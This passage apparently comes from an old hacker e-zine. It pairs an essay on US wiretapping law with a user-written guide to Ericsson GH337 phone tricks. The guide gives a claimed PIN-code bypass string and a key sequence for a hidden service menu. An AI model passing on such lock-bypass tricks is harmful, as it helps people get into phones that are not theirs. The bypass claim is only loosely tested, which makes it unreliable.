industry watch groups. Thus, interception has become more systematic.
Spies, no longer faced with a patchwork of ad hoc couriers, know better
where to look for what they seek.

Perhaps more important, interception of telecommunications leaves no
telltale "marks on the envelope." It is inherent in telecommunication--and
inseparable from its virtues--that the sender and the receiver of a
message have no way of telling who else may have recorded a copy.

Any discussion of wiretapping, particularly a legal discussion, is
complicated by the fact that electronics has not only made interception of
telecommunications possible; it has also made it easier to "bug"
face-to-face conversations.
Bugging would be nearly irrelevant to the central subject of this
document--Taking A Deeper Trip Into Wiretapping--were it not for the fact
that bugs and wiretaps are inseparably intertwined in law and
jurisprudence and named by one collective term: electronic surveillance.

Wiretaps and bugs are powerful investigative tools. They allow the
eavesdropper to overhear conversations between politicians, criminals,
lawyers, or lovers without the targets' knowing that their words are being
shared with unwanted listeners. Electronic surveillance is a tool that can
detect criminal conspiracies and provide prosecutors with strong
evidence--the conspirators' incriminating statements in their own
voices--all without danger to law-enforcement officers. On the other hand,
the very invisibility on which electronic surveillance depends for its
effectiveness makes it evasive of oversight and readily adaptable to
malign uses. Electronic surveillance can be and has been used by those in
power to undermine the democratic process by spying on their political
opponents. In light of this, it is not surprising that Congress and the
courts have approached wiretapping and bugging with suspicion.

Today, communication enjoys a measure of protection under US law, and
neither government agents nor private citizens are permitted to wiretap at
will. This has not always been the case. The current view--that wiretaps
are a kind of search--has evolved by fits and starts over a century and a
half. The Supreme Court ruled in 1967 that the police may not employ
wiretaps without court authorization. Congress has embraced this
principle, limiting police use of wiretaps and setting standards for the
granting of warrants. The same laws prohibit most wiretapping by private
citizens.

The rules against unwarranted wiretapping are not absolute, however. For
example, the courts ruled in 1992 (United States vs. David Lee Smith,
978 F.
2nd 171, US App) that conversations over cordless phones were not
protected and that police tapping of cordless phones did not require a
search warrant. A 1994 statute (Communications Assistance for Law
Enforcement Act of 1994, Public Law 103-414, §202) extended the warrant
requirements of the earlier law to cover cordless phones. The law also
makes some exceptions for businesses intercepting the communications of
their own employees on company property.

Contact.

I don't like to be contacted with subjects like "I think your article
sucks," but since you can't make everyone happy, I must learn to live with
it. For the ones with a positive attitude, you can e-mail me at
psyops@evidence2k.de with all questions security-related.

........[ Ericsson GH337 ].............................[ Pottsy ]............

Pin Codes:

Breaking the PIN CODE on 337 phones is simple, ... when asked to enter
pincode, cain in **04*0000*0000*0000# that should get thru... ive tried
this on models gh337 and 338, I assume that other models may also have
this exploit...

GH337 tricks:

The Secret Menu

Key : <  Left Arrow
      >  Right Arrow
      C  CLR

To access the secret Menu, from the main screen type >*<<*<*
You will be presented with the software release information.. use the
<, > arrows to scroll through the menu..

the menu options:

FLASH - This reboots the Phone and resets the welcome message... doesnt
seem to reset anything else.. could have something to do with Flash
Memory..

TEXT CHECK - Once going into this option, pressing any key will scroll
through all the messages your 337 displays.. eg. `read mail?' or `phone
book' any text that is programmed into the phone, excluding shit u put in
there yourself.. eg phone numbers etc.. im still trying to figure out a
way to change these messages but no luck yet.. in my next file if i figure
it out and its possible ill document it..

INIT EEPROM - (EEPROM), for those who dont know, stands for [Electrically
Erasable Programmable Read-Only Memory]...
This option restarts the phones software..

Shortcut: 0 followed by # will bring up the LAST CALL message, and the
phone number you last called, or who called you.

If you have any info that isnt in this guide please contact me :
pottsy15@hotmail.com

.................................[ outro ]..................................

This section doesnt actually do anything. Its just another thing I can put
my name on in the TOC so it looks like I do something around here.

.eof.